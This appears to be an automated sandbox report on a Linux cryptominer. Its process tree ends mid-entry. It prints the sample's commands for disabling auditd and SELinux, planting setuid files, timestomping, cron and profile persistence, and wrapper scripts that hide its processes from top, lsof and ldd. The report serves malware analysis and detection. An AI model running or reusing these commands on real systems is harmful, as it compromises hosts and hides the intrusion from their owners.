Resubmissions

08-10-2024 14:36

241008-ryjx3a1emk 5

08-10-2024 14:14

241008-rj4c6atgqb 10

Analysis

  • max time kernel
    27s
  • max time network
    149s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
  • submitted
    08-10-2024 14:14

General

  • Target

    22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13

  • Size

    8.9MB

  • MD5

    656e22c65bf7c04d87b5afbe52b8d800

  • SHA1

    0fd199053171fec86be186106eac717c4edae2ad

  • SHA256

    22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13

  • SHA512

    697954f75e391a6cc600b7d40509ac1a1515cb0a4234cc3ae4270beaf7bbc3a3da23a9cd4f25e0eb4f5956d24ca3866e2574dc9493644845aac1063e1e4b0183

  • SSDEEP

    196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Modifies the dynamic linker configuration file 2 TTPs 1 IoCs

    Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

  • XMRig Miner payload 1 IoCs
  • File and Directory Permissions Modification 1 TTPs 17 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Indicator Removal: Clear Command History 1 TTPs 1 IoCs

    Adversaries may remove indicators of compromise from the host to evade detection.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 6 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 4 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Disables SELinux 1 TTPs 3 IoCs

    Disables SELinux security module.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies special file permissions 1 TTPs 6 IoCs

    Adds special setuid and/ or setgid bits on a file, possibly to elevate privileges.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Reads hardware information 1 TTPs 19 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Reads list of loaded kernel modules 1 TTPs 3 IoCs

    Reads the list of currently loaded kernel modules, possibly to detect virtual environments.

  • Writes file to system bin folder 6 IoCs
  • Indicator Removal: Timestomp 1 TTPs 11 IoCs

    Adversaries may remove indicators of compromise from the host to evade detection.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Changes its process name 2 IoCs
  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 7 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Command and Scripting Interpreter: Unix Shell 1 TTPs 44 IoCs

    Execute scripts via Unix Shell.

  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to shm directory 31 IoCs

    Malware can drop malicious files in the shm directory which will run directly from RAM.

  • Writes file to tmp directory 31 IoCs

    Malware often drops required files in the /tmp directory.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

Processes

  • /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
    /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
    1⤵
    • Reads list of loaded kernel modules
    • Checks CPU configuration
    • Writes file to tmp directory
    PID:2478
    • /usr/bin/getconf
      getconf CLK_TCK
      2⤵
        PID:2483
      • /usr/bin/getconf
        getconf PAGESIZE
        2⤵
          PID:2484
        • /bin/sh
          /bin/sh -c "PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin;nohup /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 >/dev/null 2>/dev/null & exit"
          2⤵
          • Command and Scripting Interpreter: Unix Shell
          PID:2485
          • /usr/bin/nohup
            nohup /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
            3⤵
              PID:2486
        • /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
          /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
          1⤵
          • Deletes itself
          • Reads list of loaded kernel modules
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:2486
          • /usr/bin/getconf
            getconf CLK_TCK
            2⤵
              PID:2494
            • /usr/bin/getconf
              getconf PAGESIZE
              2⤵
                PID:2495
              • /bin/sh
                /bin/sh -c "cp /proc/2486/exe /tmp/.perf.c/gvfs-mtp-volume-monitor && chmod +x /tmp/.perf.c/gvfs-mtp-volume-monitor"
                2⤵
                • File and Directory Permissions Modification
                PID:2496
                • /usr/bin/cp
                  cp /proc/2486/exe /tmp/.perf.c/gvfs-mtp-volume-monitor
                  3⤵
                  • Writes file to tmp directory
                  PID:2497
                • /usr/bin/chmod
                  chmod +x /tmp/.perf.c/gvfs-mtp-volume-monitor
                  3⤵
                  • File and Directory Permissions Modification
                  PID:2498
              • /bin/sh
                /bin/sh -c "PATH=/tmp/.perf.c:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin;gvfs-mtp-volume-monitor -k &"
                2⤵
                • Command and Scripting Interpreter: Unix Shell
                PID:2499
            • /tmp/.perf.c/gvfs-mtp-volume-monitor
              gvfs-mtp-volume-monitor -k
              1⤵
              • Modifies the dynamic linker configuration file
              • Executes dropped EXE
              • Checks hardware identifiers (DMI)
              • Creates/modifies Cron job
              • Creates/modifies environment variables
              • Enumerates active TCP sockets
              • Modifies systemd
              • Reads hardware information
              • Reads list of loaded kernel modules
              • Writes file to system bin folder
              • Modifies Bash startup script
              • Checks CPU configuration
              • Reads system network configuration
              • Enumerates kernel/hardware configuration
              • Reads runtime system information
              • Writes file to shm directory
              • Writes file to tmp directory
              PID:2500
              • /usr/bin/getconf
                getconf CLK_TCK
                2⤵
                  PID:2505
                • /usr/bin/getconf
                  getconf PAGESIZE
                  2⤵
                    PID:2506
                  • /bin/sh
                    /bin/sh -c "auditctl -e0"
                    2⤵
                    • Command and Scripting Interpreter: Unix Shell
                    PID:2507
                    • /usr/sbin/auditctl
                      auditctl -e0
                      3⤵
                        PID:2509
                    • /bin/sh
                      /bin/sh -c "echo 0 > /sys/fs/selinux/enforce"
                      2⤵
                      • Command and Scripting Interpreter: Unix Shell
                      PID:2511
                    • /bin/sh
                      /bin/sh -c "setenforce 0"
                      2⤵
                      • Command and Scripting Interpreter: Unix Shell
                      PID:2513
                      • /usr/sbin/setenforce
                        setenforce 0
                        3⤵
                        • Disables SELinux
                        PID:2514
                    • /bin/sh
                      /bin/sh -c "if grep -q '^SELINUX=' /etc/selinux/config;then sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/selinux/config;fi"
                      2⤵
                      • Command and Scripting Interpreter: Unix Shell
                      PID:2515
                      • /usr/bin/grep
                        grep -q "^SELINUX=" /etc/selinux/config
                        3⤵
                          PID:2516
                        • /usr/bin/sed
                          sed -i "s/^SELINUX=.*/SELINUX=disabled/" /etc/selinux/config
                          3⤵
                            PID:2517
                        • /bin/sh
                          /bin/sh -c "if systemctl status auditd|grep -q 'enabled;';then systemctl stop auditd;systemctl disable auditd;fi"
                          2⤵
                          • Command and Scripting Interpreter: Unix Shell
                          PID:2529
                          • /usr/bin/systemctl
                            systemctl status auditd
                            3⤵
                              PID:2530
                            • /usr/bin/grep
                              grep -q "enabled;"
                              3⤵
                                PID:2531
                              • /usr/bin/systemctl
                                systemctl stop auditd
                                3⤵
                                • Indicator Removal: Clear Command History
                                PID:2539
                              • /usr/bin/systemctl
                                systemctl disable auditd
                                3⤵
                                • Changes its process name
                                PID:2547
                                • /usr/bin/getopt
                                  getopt -o r: --long root: -- disable auditd
                                  4⤵
                                    PID:2549
                                  • /usr/sbin/update-rc.d
                                    /usr/sbin/update-rc.d auditd defaults
                                    4⤵
                                      PID:2550
                                      • /tmp/.perf.c/systemctl
                                        systemctl daemon-reload
                                        5⤵
                                          PID:2553
                                        • /tmp/systemctl
                                          systemctl daemon-reload
                                          5⤵
                                            PID:2553
                                          • /usr/local/sbin/systemctl
                                            systemctl daemon-reload
                                            5⤵
                                              PID:2553
                                            • /usr/local/bin/systemctl
                                              systemctl daemon-reload
                                              5⤵
                                                PID:2553
                                              • /usr/sbin/systemctl
                                                systemctl daemon-reload
                                                5⤵
                                                  PID:2553
                                                • /usr/bin/systemctl
                                                  systemctl daemon-reload
                                                  5⤵
                                                    PID:2553
                                                • /usr/sbin/update-rc.d
                                                  /usr/sbin/update-rc.d auditd disable
                                                  4⤵
                                                    PID:2726
                                                    • /tmp/.perf.c/systemctl
                                                      systemctl daemon-reload
                                                      5⤵
                                                        PID:2730
                                                      • /tmp/systemctl
                                                        systemctl daemon-reload
                                                        5⤵
                                                          PID:2730
                                                        • /usr/local/sbin/systemctl
                                                          systemctl daemon-reload
                                                          5⤵
                                                            PID:2730
                                                          • /usr/local/bin/systemctl
                                                            systemctl daemon-reload
                                                            5⤵
                                                              PID:2730
                                                            • /usr/sbin/systemctl
                                                              systemctl daemon-reload
                                                              5⤵
                                                                PID:2730
                                                              • /usr/bin/systemctl
                                                                systemctl daemon-reload
                                                                5⤵
                                                                  PID:2730
                                                          • /bin/sh
                                                            /bin/sh -c "chmod 4755 /bin/wizlmsh"
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:2535
                                                            • /usr/bin/chmod
                                                              chmod 4755 /bin/wizlmsh
                                                              3⤵
                                                              • File and Directory Permissions Modification
                                                              PID:2536
                                                          • /bin/sh
                                                            /bin/sh -c "touch -acmr /bin/sh /bin/wizlmsh"
                                                            2⤵
                                                            • Indicator Removal: Timestomp
                                                            PID:2537
                                                            • /usr/bin/touch
                                                              touch -acmr /bin/sh /bin/wizlmsh
                                                              3⤵
                                                              • Indicator Removal: Timestomp
                                                              PID:2538
                                                          • /bin/sh
                                                            /bin/sh -c "touch -acmr /bin/sh /bin/perfcc"
                                                            2⤵
                                                            • Indicator Removal: Timestomp
                                                            PID:2551
                                                            • /usr/bin/touch
                                                              touch -acmr /bin/sh /bin/perfcc
                                                              3⤵
                                                              • Indicator Removal: Timestomp
                                                              PID:2552
                                                          • /bin/sh
                                                            /bin/sh -c "touch -acmr /bin/sh /bin/perfcc"
                                                            2⤵
                                                            • Indicator Removal: Timestomp
                                                            PID:2573
                                                            • /usr/bin/touch
                                                              touch -acmr /bin/sh /bin/perfcc
                                                              3⤵
                                                              • Indicator Removal: Timestomp
                                                              PID:2576
                                                          • /bin/sh
                                                            /bin/sh -c "touch -acmr /bin/sh /bin/perfcc"
                                                            2⤵
                                                            • Indicator Removal: Timestomp
                                                            PID:2619
                                                            • /usr/bin/touch
                                                              touch -acmr /bin/sh /bin/perfcc
                                                              3⤵
                                                              • Indicator Removal: Timestomp
                                                              PID:2625
                                                          • /bin/sh
                                                            /bin/sh -c "(crontab -l|grep -v -e perfcc -e /tmp/.perf;echo '11 * * * * /root/.config/cron/perfcc')|crontab -"
                                                            2⤵
                                                            • Command and Scripting Interpreter: Unix Shell
                                                            PID:2670
                                                            • /usr/bin/crontab
                                                              crontab -
                                                              3⤵
                                                              • Creates/modifies Cron job
                                                              PID:2672
                                                            • /usr/bin/crontab
                                                              crontab -l
                                                              3⤵
                                                                PID:2673
                                                              • /usr/bin/grep
                                                                grep -v -e perfcc -e /tmp/.perf
                                                                3⤵
                                                                  PID:2674
                                                              • /bin/sh
                                                                /bin/sh -c "sed -n -i '/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc' /root/.profile;touch -acmr /bin/sh /root/.profile"
                                                                2⤵
                                                                • Indicator Removal: Timestomp
                                                                PID:2684
                                                                • /usr/bin/sed
                                                                  sed -n -i "/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc" /root/.profile
                                                                  3⤵
                                                                    PID:2685
                                                                  • /usr/bin/touch
                                                                    touch -acmr /bin/sh /root/.profile
                                                                    3⤵
                                                                    • Indicator Removal: Timestomp
                                                                    PID:2686
                                                                • /bin/sh
                                                                  /bin/sh -c "cp /proc/2500/exe /lib/libpprocps.so && chmod +x /lib/libpprocps.so"
                                                                  2⤵
                                                                  • File and Directory Permissions Modification
                                                                  PID:2688
                                                                  • /usr/bin/cp
                                                                    cp /proc/2500/exe /lib/libpprocps.so
                                                                    3⤵
                                                                      PID:2689
                                                                    • /usr/bin/chmod
                                                                      chmod +x /lib/libpprocps.so
                                                                      3⤵
                                                                      • File and Directory Permissions Modification
                                                                      PID:2690
                                                                  • /bin/sh
                                                                    /bin/sh -c "cp /proc/2500/exe /lib/libfsnldev.so && chmod +x /lib/libfsnldev.so"
                                                                    2⤵
                                                                    • File and Directory Permissions Modification
                                                                    PID:2691
                                                                    • /usr/bin/cp
                                                                      cp /proc/2500/exe /lib/libfsnldev.so
                                                                      3⤵
                                                                        PID:2692
                                                                      • /usr/bin/chmod
                                                                        chmod +x /lib/libfsnldev.so
                                                                        3⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:2693
                                                                    • /bin/.local/bin/top
                                                                      /bin/.local/bin/top
                                                                      2⤵
                                                                        PID:2694
                                                                      • /bin/bash
                                                                        /bin/.local/bin/top -c "exec '/bin/.local/bin/top' \"\$@\"" /bin/.local/bin/top
                                                                        2⤵
                                                                          PID:2694
                                                                        • /bin/.local/bin/top
                                                                          /bin/.local/bin/top
                                                                          2⤵
                                                                            PID:2694
                                                                          • /bin/bash
                                                                            /bin/.local/bin/top -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='top' m='perfctl' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else trap 'rm -rf /tmp/smpr &>/dev/null' EXIT trap 'rm -rf /tmp/smpr &>/dev/null' SIGINT touch /tmp/smpr &>/dev/null export AAZHDE=1 pkill -9 \$m &>/dev/null killall -9 \$m &>/dev/null ps -ax|grep \$m|grep -v grep|awk '{print \$1}'|xargs kill -9 &>/dev/null ps -ax|grep \$m|grep -vq grep || rm -rf /tmp/.apid &>/dev/null unset AAZHDE \$r \$@ fi " /bin/.local/bin/top
                                                                            2⤵
                                                                              PID:2694
                                                                              • /usr/bin/env
                                                                                env
                                                                                3⤵
                                                                                  PID:2695
                                                                                • /usr/bin/grep
                                                                                  grep -q ABWTRX
                                                                                  3⤵
                                                                                    PID:2696
                                                                                • /bin/.local/bin/crontab
                                                                                  /bin/.local/bin/crontab
                                                                                  2⤵
                                                                                    PID:2697
                                                                                  • /bin/bash
                                                                                    /bin/.local/bin/crontab -c "exec '/bin/.local/bin/crontab' \"\$@\"" /bin/.local/bin/crontab
                                                                                    2⤵
                                                                                      PID:2697
                                                                                    • /bin/.local/bin/crontab
                                                                                      /bin/.local/bin/crontab
                                                                                      2⤵
                                                                                        PID:2697
                                                                                      • /bin/bash
                                                                                        /bin/.local/bin/crontab -c " #!/bin/bash function rcrj(){ (\$r -l|grep -v -e perfcc -e /tmp/.perf;echo \"11 * * * * \$ap\")|\$r - } if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='crontab' a='perfcc' ap=\"\$HOME/.config/cron/perfcc\" p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else trap rcrj EXIT \$r -l|grep -Fv -e \$a -e /tmp/.perf|\$r - \$r \$@ fi " /bin/.local/bin/crontab
                                                                                        2⤵
                                                                                          PID:2697
                                                                                          • /usr/bin/grep
                                                                                            grep -q ABWTRX
                                                                                            3⤵
                                                                                              PID:2699
                                                                                            • /usr/bin/env
                                                                                              env
                                                                                              3⤵
                                                                                                PID:2698
                                                                                            • /bin/.local/bin/ldd
                                                                                              /bin/.local/bin/ldd
                                                                                              2⤵
                                                                                                PID:2700
                                                                                              • /bin/bash
                                                                                                /bin/.local/bin/ldd -c "exec '/bin/.local/bin/ldd' \"\$@\"" /bin/.local/bin/ldd
                                                                                                2⤵
                                                                                                  PID:2700
                                                                                                • /bin/.local/bin/ldd
                                                                                                  /bin/.local/bin/ldd
                                                                                                  2⤵
                                                                                                    PID:2700
                                                                                                  • /bin/bash
                                                                                                    /bin/.local/bin/ldd -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='ldd' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -v gcwrap fi " /bin/.local/bin/ldd
                                                                                                    2⤵
                                                                                                      PID:2700
                                                                                                      • /usr/bin/env
                                                                                                        env
                                                                                                        3⤵
                                                                                                          PID:2701
                                                                                                        • /usr/bin/grep
                                                                                                          grep -q ABWTRX
                                                                                                          3⤵
                                                                                                            PID:2702
                                                                                                        • /bin/.local/bin/lsof
                                                                                                          /bin/.local/bin/lsof
                                                                                                          2⤵
                                                                                                            PID:2703
                                                                                                          • /bin/bash
                                                                                                            /bin/.local/bin/lsof -c "exec '/bin/.local/bin/lsof' \"\$@\"" /bin/.local/bin/lsof
                                                                                                            2⤵
                                                                                                              PID:2703
                                                                                                            • /bin/.local/bin/lsof
                                                                                                              /bin/.local/bin/lsof
                                                                                                              2⤵
                                                                                                                PID:2703
                                                                                                              • /bin/bash
                                                                                                                /bin/.local/bin/lsof -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='lsof' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -Fv -e 'perfcc' -e 'perfctl' -e '.dmesg' -e '.xdiag' -e 'gcwrap' fi " /bin/.local/bin/lsof
                                                                                                                2⤵
                                                                                                                  PID:2703
                                                                                                                  • /usr/bin/env
                                                                                                                    env
                                                                                                                    3⤵
                                                                                                                      PID:2704
                                                                                                                    • /usr/bin/grep
                                                                                                                      grep -q ABWTRX
                                                                                                                      3⤵
                                                                                                                        PID:2705
                                                                                                                    • /bin/sh
                                                                                                                      /bin/sh -c "chmod 755 /bin/.local/bin/*;touch -acmr /etc/passwd /bin/.local/bin/*"
                                                                                                                      2⤵
                                                                                                                      • File and Directory Permissions Modification
                                                                                                                      PID:2706
                                                                                                                      • /usr/bin/chmod
                                                                                                                        chmod 755 /bin/.local/bin/crontab /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/top
                                                                                                                        3⤵
                                                                                                                        • File and Directory Permissions Modification
                                                                                                                        PID:2707
                                                                                                                      • /usr/bin/touch
                                                                                                                        touch -acmr /etc/passwd /bin/.local/bin/crontab /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/top
                                                                                                                        3⤵
                                                                                                                        • Indicator Removal: Timestomp
                                                                                                                        PID:2708
                                                                                                                    • /bin/sh
                                                                                                                      /bin/sh -c "touch /tmp/lgcdm /tmp/d.xdiag-0;unset AAZHDE;LD_PRELOAD=/tmp/libgcwrap.so LGCEXTR=1 ls -la /tmp > /tmp/lgctr 2>&1;rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so"
                                                                                                                      2⤵
                                                                                                                      • Command and Scripting Interpreter: Unix Shell
                                                                                                                      • Writes file to tmp directory
                                                                                                                      PID:2709
                                                                                                                      • /usr/bin/touch
                                                                                                                        touch /tmp/lgcdm /tmp/d.xdiag-0
                                                                                                                        3⤵
                                                                                                                        • Disables SELinux
                                                                                                                        • Writes file to tmp directory
                                                                                                                        PID:2710
                                                                                                                      • /usr/bin/ls
                                                                                                                        ls -la /tmp
                                                                                                                        3⤵
                                                                                                                          PID:2711
                                                                                                                        • /usr/bin/rm
                                                                                                                          rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so
                                                                                                                          3⤵
                                                                                                                            PID:2712
                                                                                                                        • /bin/sh
                                                                                                                          /bin/sh -c "LD_PRELOAD=/tmp/libgcwrap.so sh -c 'echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1'"
                                                                                                                          2⤵
                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                          PID:2713
                                                                                                                          • /usr/bin/sh
                                                                                                                            sh -c "echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1"
                                                                                                                            3⤵
                                                                                                                            • Writes file to tmp directory
                                                                                                                            PID:2714
                                                                                                                            • /usr/bin/cat
                                                                                                                              cat
                                                                                                                              4⤵
                                                                                                                                PID:2716
                                                                                                                          • /bin/sh
                                                                                                                            /bin/sh -c "chmod g+s /lib/libgcwrap.so"
                                                                                                                            2⤵
                                                                                                                            • Command and Scripting Interpreter: Unix Shell
                                                                                                                            PID:2717
                                                                                                                            • /usr/bin/chmod
                                                                                                                              chmod g+s /lib/libgcwrap.so
                                                                                                                              3⤵
                                                                                                                              • Modifies special file permissions
                                                                                                                              PID:2718
                                                                                                                          • /bin/sh
                                                                                                                            /bin/sh -c "for f in \$(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:\$PATH' \$f;done"
                                                                                                                            2⤵
                                                                                                                            • Command and Scripting Interpreter: Unix Shell
                                                                                                                            PID:2719
                                                                                                                            • /usr/bin/find
                                                                                                                              find /usr/share/initramfs-tools/hooks -type f
                                                                                                                              3⤵
                                                                                                                                PID:2721
                                                                                                                              • /usr/bin/xargs
                                                                                                                                xargs grep -s -l "ldd "
                                                                                                                                3⤵
                                                                                                                                  PID:2722
                                                                                                                                  • /tmp/.perf.c/grep
                                                                                                                                    grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                    4⤵
                                                                                                                                      PID:2724
                                                                                                                                    • /tmp/grep
                                                                                                                                      grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                      4⤵
                                                                                                                                        PID:2724
                                                                                                                                      • /usr/local/sbin/grep
                                                                                                                                        grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                        4⤵
                                                                                                                                          PID:2724
                                                                                                                                        • /usr/local/bin/grep
